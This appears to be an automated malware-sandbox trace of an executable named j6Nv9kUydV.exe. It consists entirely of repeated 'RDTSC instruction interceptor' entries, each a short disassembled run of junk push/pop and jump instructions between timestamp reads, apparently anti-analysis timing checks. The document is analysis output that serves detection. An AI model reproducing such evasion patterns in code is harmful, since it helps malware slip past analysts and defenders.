Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F996AA second address: F996B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F996B6 second address: F996BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F996BC second address: F996C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F9DBB5 second address: F9DBBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F9DD0E second address: F9DD62 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBCC4DE8CC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FBCC4DE8CD8h 0x00000012 jmp 00007FBCC4DE8CCBh 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b je 00007FBCC4DE8CC6h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 push edi 0x00000028 push edi 0x00000029 pop edi 0x0000002a push ecx 0x0000002b pop ecx 0x0000002c pop edi 0x0000002d jmp 00007FBCC4DE8CCEh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FA3832 second address: FA3836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FA3836 second address: FA383C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FA383C second address: FA3843 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FA3F3A second address: FA3F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCC4DE8CCDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FA40DB second address: FA40E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FA4B80 second address: FA4B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FA80F7 second address: FA80FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FA80FE second address: FA8108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FBCC4DE8CC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FA8108 second address: FA810E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FA7842 second address: FA7852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FA7B30 second address: FA7B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FBCC4EB33A6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FA7B3F second address: FA7B71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FBCC4DE8CD0h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FA7B71 second address: FA7B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FBCC4EB33A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FAC41C second address: FAC420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FAC420 second address: FAC426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FAC426 second address: FAC42D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FAB6C1 second address: FAB6D5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007FBCC4EB33A6h 0x00000009 ja 00007FBCC4EB33A6h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FAB98E second address: FAB9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnp 00007FBCC4DE8CC6h 0x0000000b jg 00007FBCC4DE8CC6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FAB9A1 second address: FAB9C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBCC4EB33ADh 0x0000000f jmp 00007FBCC4EB33AEh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FABB95 second address: FABBA3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FBCC4DE8CC6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FABD3F second address: FABD5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4EB33B9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FAC01E second address: FAC023 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FAC023 second address: FAC03C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4EB33B3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB2B5E second address: FB2B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB2B62 second address: FB2B66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB2B66 second address: FB2B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB2B73 second address: FB2B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 popad 0x0000000a jl 00007FBCC4EB33AEh 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB313F second address: FB3156 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FBCC4DE8CD1h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB3156 second address: FB316E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBCC4EB33AAh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b jne 00007FBCC4EB33ACh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB378A second address: FB37A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBCC4DE8CD7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB3A3D second address: FB3A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB3A41 second address: FB3A53 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBCC4DE8CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB3A53 second address: FB3A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnp 00007FBCC4EB33A8h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB3D0E second address: FB3D34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FBCC4DE8CC6h 0x00000011 jmp 00007FBCC4DE8CD0h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB3D34 second address: FB3D38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB3D38 second address: FB3D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB3D3E second address: FB3D73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBCC4EB33B8h 0x00000008 jmp 00007FBCC4EB33B2h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB4027 second address: FB4044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4DE8CCCh 0x00000009 popad 0x0000000a push eax 0x0000000b jp 00007FBCC4DE8CC6h 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB4044 second address: FB4053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FBCC4EB33A6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB4053 second address: FB4057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB4057 second address: FB4063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB4063 second address: FB4067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB45C7 second address: FB45F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBCC4EB33B3h 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FBCC4EB33ADh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB990A second address: FB9922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBCC4DE8CCDh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB8B0A second address: FB8B19 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnc 00007FBCC4EB33A6h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB8FA2 second address: FB8FB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a js 00007FBCC4DE8CCCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB910F second address: FB9115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FB9115 second address: FB911F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBCC4DE8CC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FC0708 second address: FC0721 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33B5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FC6CCE second address: FC6CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FC6E68 second address: FC6E72 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBCC4EB33A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FC6E72 second address: FC6E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FC6FD1 second address: FC6FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FC7152 second address: FC7157 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FC7472 second address: FC7476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FC75D5 second address: FC75D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FC75D9 second address: FC761B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33B0h 0x00000007 jmp 00007FBCC4EB33B0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FBCC4EB33B5h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FC761B second address: FC7621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FC7621 second address: FC7625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FC7625 second address: FC7636 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CCDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FC7783 second address: FC7788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FC7788 second address: FC7790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FD03A7 second address: FD03AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FD0517 second address: FD051E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FD6CC9 second address: FD6CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FD6CCD second address: FD6D0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBCC4DE8CD9h 0x00000013 je 00007FBCC4DE8CC6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FD6D0C second address: FD6D10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FD6D10 second address: FD6D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4DE8CD5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FE0C92 second address: FE0CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4EB33B7h 0x00000009 popad 0x0000000a popad 0x0000000b jnl 00007FBCC4EB33C2h 0x00000011 jno 00007FBCC4EB33AEh 0x00000017 push eax 0x00000018 push edx 0x00000019 jns 00007FBCC4EB33A6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FE291F second address: FE2925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FE59B2 second address: FE59CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FBCC4EB33AEh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FE59CA second address: FE59D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FE59D0 second address: FE59DA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBCC4EB33A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FE539B second address: FE53AD instructions: 0x00000000 rdtsc 0x00000002 js 00007FBCC4DE8CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FBCC4DE8CC6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FE53AD second address: FE53B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FE53B1 second address: FE53CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FBCC4DE8CC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007FBCC4DE8CCAh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FE53CA second address: FE53FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBCC4EB33A6h 0x0000000a pop edi 0x0000000b popad 0x0000000c jnp 00007FBCC4EB33F6h 0x00000012 pushad 0x00000013 jne 00007FBCC4EB33A6h 0x00000019 jmp 00007FBCC4EB33B9h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FE53FE second address: FE5407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FE5407 second address: FE540D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FEA6E1 second address: FEA6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4DE8CCAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FEA6EF second address: FEA6FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FF23E7 second address: FF23F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBCC4DE8CC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FBCC4DE8CC6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FF2276 second address: FF228A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBCC4EB33A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FF228A second address: FF228E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FF228E second address: FF229E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBCC4EB33A6h 0x00000008 jp 00007FBCC4EB33A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FF229E second address: FF22A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFD075 second address: FFD07B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFD07B second address: FFD07F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
